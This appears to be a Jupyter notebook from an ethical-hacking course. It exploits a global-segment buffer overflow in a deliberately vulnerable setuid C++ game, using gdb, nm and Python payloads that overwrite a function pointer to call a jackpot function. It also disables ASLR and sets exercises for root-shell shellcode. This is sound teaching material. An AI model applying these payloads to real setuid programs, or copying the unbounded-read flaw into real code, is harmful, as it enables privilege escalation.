# Global Segment Overflow
- recall function pointers are pointers that store addresses of functions/code
    - see CFundamentals Notebooks for a review
- function pointers can be overwritten using overflow techniques to point to different code/function


## lucky 7 - vegas game
- various luck-based games that're favored to the house
- program uses a function pointer to remember the last game played by the user
- the last game function's address is stored in the **User** structure
- player object is declared as an uninitialized global variable
    - meaning the memory is allocated in the **bss** segment
- seteuid multi-user program that stores player's data in /var folder
- only root or sudo user can access players' info stored in /var folder
- each player is identified by the system's user id
- examine and compile and run game programs in demos/other_overflow/ folder
- game is divided into one header file and 2 .cpp files
- use the provided Makefile found in the same folder; uses C++17 specific features such as system specific file permission
- NOTE: program must be setuid, to read/write the database file: `/var/lucky7.txt`

In [1]:
! cat demos/other_overflow/main.cpp

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include <unistd.h> //getuid()
#include <sys/types.h> // getuid()
#include <iostream>
#include "lucky7.h"

char DATAFILE[] = "/var/lucky7.txt"; // File to store players data

using namespace std;

// Global variables
User player;      // Player struct

int main(int argc, char* argv[]) {
   int choice, last_game;

   if(not read_player_data(DATAFILE,  player)) // Try to read player data from file.
      register_new_player(DATAFILE, player);    // If there is no data, register a new player.

   do {
      choice = get_choice(player);
      if (choice < 4) {
         if (choice != last_game) {
            switch(choice) {
               case 1:
                  cout << "\n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\n"
                  << "Machine will generate 1 random numbers each between 1 and 9.\n"
                  << "If the number is 7, you win a jack

In [2]:
! cat demos/other_overflow/lucky7.cpp

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include <unistd.h> //getuid()
#include <sys/types.h> // getuid()
#include <iostream>
#include <fstream>
#include <iomanip>
#include <filesystem> // file system specific permission

#include "lucky7.h"

using namespace std;
namespace fs = std::filesystem;

int get_choice(User &player) {
   size_t choice = 0;
   do{
      //system("clear");
      cout << "-=[ Lucky 7 Game Menu ]=-\n";
      cout << "1 - Play Lucky 7 game\n";
      cout << "2 - Play Lucky 777 game\n";
      cout << "3 - Play Lucky 77777 game\n";
      cout << "4 - View your total credits\n";
      cout << "5 - Change your user name\n";
      cout << "6 - Reset your account at 500 credits\n";
      cout << "7 - Quit\n";
      printf("[Name: %s]\n", player.name);
      printf("[You have %u credits] ->  ", player.credits);
      cout << "Enter your choice [1-7]: ";
      cin >> choice;
      if(cin.fail())
 

- change current working directory to other_overflow folder where the program and Makefile are
- compile using the Makefile

In [5]:
%cd ./demos/other_overflow

/home/kali/projects/EthicalHacking/demos/other_overflow


In [8]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -m32 -std=c++17 -fno-stack-protector -z execstack -no-pie lucky7.cpp main.cpp  -o lucky7.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
0
sudo chown root:root lucky7.exe 
sudo chmod +s lucky7.exe  


In [9]:
# program uses /var/lucky7.txt to store player's information
# let's take a look into it
! echo kali | sudo -S cat /var/lucky7.txt
# userid     credits    palaer's_full_name

[sudo] password for kali: 1000      10220          John Smith                                                                                          A�


In [10]:
# if file exists, delete it to start fresh
! echo kali | sudo -S rm /var/lucky7.txt

[sudo] password for kali: 

In [11]:
! ls -al /var/lucky7.txt

ls: cannot access '/var/lucky7.txt': No such file or directory


In [13]:
! ls -l lucky7.exe

-rwsr-sr-x 1 root root 257728 Jul 21 10:30 lucky7.exe


### play the interactive game
- lucky is an interactive program that doesn't work with Jupyter Notebook as of Aug. 2021
- Use Terminal to play the program; follow the menu provided by the program to play the game
- press `CTRL-Z` to temporarily suspend (put it in background) the current process
- enter `fg` command to bring the suspended program to fore ground

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe                                                                                                                                                                      
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith
                                                                                                                             
Welcome to the Lucky 7 Game John Smith.                                                                                      
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] ->  Enter your choice [1-7]: 2

~*~*~ Lucky 777 ~*~*~
Costs 50 credits to play this game.
Machine will generate 3 random numbers each between 1 and 9.
If all 3 numbers are 7, you win a jackpot of 100 THOUSAND
If all 3 numbers match, you win 10 THOUSAND
Otherwise, you lose.
 Enter to continue...

[DEBUG] current_game pointer 0x0804b1cd
3 random numers are: 4 3 4 
Sorry! Better luck next time...

You have 450 credits
Would you like to play again? [y/n]:
```

### Find the vulnerability in the game
- do code review to find global **player** object and `change_username()`
- note **user** struct has declared name buffer of 100 bytes
- change_username() function uses `mgest()` function to read and store data into name field one character at a time until '\n'
- there's nothing to limit it to the length of the destination buffer!
- so, the game has buffer overrun/overflow vulnerability!

### Exploit the overflow vulnerability
- run the program
- explore the memory addresses of **name** and **current_game** using peda/gdb
- use gdb to debug the live process
- find the process id of lucky7.exe process

```bash
┌──(kali㉿K)-[~]
└─$ ps aux | grep lucky7.exe                          
root       30439  0.1  0.0   5476  1344 pts/2    S+   10:54   0:00 ./lucky7.exe
kali       30801  0.0  0.0   6320   724 pts/3    S+   10:59   0:00 grep --color=auto lucky7.exe


- use the process_id to debug in gdb

┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ sudo gdb -q --pid=59004 --symbols=./lucky7.exe

(gdb) p/x &player.name
$1 = 0x8050148

(gdb) p/x &player.current_game
$2 = 0x80501ac

(gdb) p/u 0x80501ac - 0x8050148 # (address of player.current_game) - (address of player.name)
$3 = 100
```

- notice, **name[100]** is at a lower address
- **(\*current_game)()** is at a higher address find the exact size that would overlfow the current_game
- the offset should be at least 100 bytes

### Let's overwrite the current_game's value with our controlled address

- create a string with 100As + BBBB
- detach the process from gdb and change the name with menu option 5 pasting the following buffer
- Enter 1 to play the game and the buffer should overwrite the [DEBUG] current_game pointer with 0x42424242

In [11]:
# change the name to the following string
! python -c 'print("A"*100 + "B"*4)'

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB


- run the program and play the last game after changing name

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe           
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith

Welcome to the Lucky 7 Game John Smith.
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] ->  Enter your choice [1-7]: 1

~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b141
the random number is: 8 
Sorry! Better luck next time...

You have 490 credits
Would you like to play again? [y/n]: n
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 490 credits] ->  Enter your choice [1-7]: 5

Change user name
Enter your new name:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 490 credits] ->  Enter your choice [1-7]: 1

[DEBUG] current_game pointer 0x42424242
zsh: segmentation fault  ./lucky7.exe
```

### Find useful functions/code in the program to execute
- **nm** command lists symbols in object files with corresponding addresses
    - can be used to find addresses of various functions in a program
- `jackpot()` functions are intruiging!

```bash
┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ nm ./lucky7.exe                                                                                              
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ nm ./lucky7.exe                                                                                                     139 ⨯
08050114 B __bss_start
08050120 b completed.0
         U __cxa_atexit@GLIBC_2.1.3
08050104 D DATAFILE
080500f8 D __data_start
080500f8 W data_start
0804a440 t deregister_tm_clones
0804a420 T _dl_relocate_static_pie
0804a4c0 t __do_global_dtors_aux
0804fee4 d __do_global_dtors_aux_fini_array_entry
080500fc D __dso_handle
08050100 V DW.ref.__gxx_personality_v0
0804fee8 d _DYNAMIC
08050114 D _edata
080501b4 B _end
         U exit@GLIBC_2.0
0804c3d8 T _fini
0804d000 R _fp_hw
0804a4f0 t frame_dummy
0804fed8 d __frame_dummy_init_array_entry
0804e438 r __FRAME_END__
         U getchar@GLIBC_2.0
         U getuid@GLIBC_2.0
08050000 d _GLOBAL_OFFSET_TABLE_
0804c34a t _GLOBAL__sub_I_DATAFILE
0804b5a0 t _GLOBAL__sub_I__Z10get_choiceR4User
         w __gmon_start__
0804d7e4 r __GNU_EH_FRAME_HDR
         U __gxx_personality_v0@CXXABI_1.3
0804a000 T _init
0804fee4 d __init_array_end
0804fed8 d __init_array_start
0804d004 R _IO_stdin_used
0804c3d0 T __libc_csu_fini
0804c370 T __libc_csu_init
         U __libc_start_main@GLIBC_2.0
0804bcda T main
08050140 B player
         U printf@GLIBC_2.0
         U puts@GLIBC_2.0
         U rand@GLIBC_2.0
0804a480 t register_tm_clones
         U sleep@GLIBC_2.0
         U srand@GLIBC_2.0
0804a3e0 T _start
         U strcpy@GLIBC_2.0
         U strlen@GLIBC_2.0
         U time@GLIBC_2.0
08050114 D __TMC_END__
         U _Unwind_Resume@GCC_3.0
0804bcd2 T __x86.get_pc_thunk.ax
0804c3d1 T __x86.get_pc_thunk.bp
0804a430 T __x86.get_pc_thunk.bx
0804bcd6 T __x86.get_pc_thunk.si
0804a4f2 T _Z10get_choiceR4User
0804bfeb T _Z10jackpot10Kv !!!!!!!!!<- JACKPOT ---> !!!!!!!!!!
0804b2b8 T _Z10lucky77777v
0804c038 T _Z11jackpot100Kv
0804b042 T _Z11printNumberi
0804b3fb T _Z12reset_creditPcR4User
0804aeeb T _Z12show_creditsRK4User
0804c181 T _Z13play_the_gamev
0804c0d2 T _Z14deduct_creditsv
0804c29c T _Z15change_usernamev
0804ac37 T _Z16read_player_dataPcR4User
0804b429 T _Z17get_random_numberi
0804a97f T _Z18update_player_dataPcR4User
0804a6c0 T _Z19register_new_playerPcR4User
0804b547 t _Z41__static_initialization_and_destruction_0ii
0804c2f1 t _Z41__static_initialization_and_destruction_0ii
0804ae82 T _Z5mgetsPc
0804b141 T _Z6lucky7v
0804b46d T _Z6rstripRNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
0804b1cd T _Z8lucky777v
0804c085 T _Z9jackpot1Mv
0804b7fc W _ZN9__gnu_cxx11char_traitsIcE2eqERKcS3_
0804b81c W _ZN9__gnu_cxx11char_traitsIcE6lengthEPKc
...

```

### Script the interactive user input
- instead of typing options and commands interactively, they can be scripted and piped into the program
- program can then parse and use the input as if someone is interactively typing it from the std input stream
- make sure the game has been played atleast once by the current user
    - the following script needs to start with full name otherwise!

In [2]:
# play game #1, y, n; 
# Enter 7 to quit
! python -c 'print("1\ny\nn\n7")'

1
y
n
7


In [6]:
%pwd

'/home/kali/projects/EthicalHacking/demos/other_overflow'

In [8]:
! python -c 'print("1\ny\nn\n7")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 99320 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0c1
the random number is: 2 
Sorry! Better luck next time...

You have 99310 credits
Would you like to play again? [y/n]: 
[DEBUG] current_game pointer 0x0804b0c1
the random number is: 1 
Sorry! Better luck next time...

You have 99300 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5

In [9]:
# let's replace the current_game with out own data (BBBB)
! python -c 'print("1\nn\n5\n" + "A"*100 + "BBBB\n" + "1\nn\n7")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 109290 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0c1
the random number is: 6 
Sorry! Better luck next time...

You have 109280 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In [10]:
# note the jackpot()'s address
! nm ./lucky7.exe | grep jackpot

0804bf6b T _Z10jackpot10Kv
0804bfb8 T _Z11jackpot100Kv
0804c005 T _Z9jackpot1Mv


In [11]:
# let's create a string mimicking game play with jackpot100K address!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\nn\n7\n")'
# the following is the sequnce of user input to play the game

1
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��
1
n
7


In [12]:
# now let's hit the Jackpot to receive 100K credit!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\nn\n7\n")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 109280 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0c1
the random number is: 5 
Sorry! Better luck next time...

You have 109270 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In [13]:
# let's hit the Jackpot 2 times in a row!
# and change to your actual name
# now let's hit the Jackpot!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\ny\nn\n5\nJohn Smith\n2\nn\n7\n")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith                                                                                          ]
[You have 609200 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0c1
the random number is: 9 
Sorry! Better luck next time...

You have 609190 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith                                                                    

## Exploiting with shellcode
- as the program is setuid; it "should" give you a root shell if you can manage to smuggle and execute root shellcode!

## Stashing shellcode in environment variable
- one easy way to exploit is by stashing shellcode as an environment variable
- once the shellcode is exported, you can use getenvaddr program provided
- use the address relative to the lucky7.exe program to execute the stashed shellcode
- run all or some of the following commands in Terminal

### Left as an exercise

``` 
$ cat lucky7_exploit.bin - | ./game_of_chance
```

- NOTICE: the hyphen after the exploit
- tells the cat program to send standard input after the exploit buffer, returning control of the input
- eventhough the shell doesn't display its prompt, it is still accessible
- stash both and user and root shell and force the program execute them

### Exploit with shellcode overflowing name field
- left as an exercise

## Exercise
- smuggle the shellcode into the name field, find it's address and exploit the program.
- smuggle both user and root shells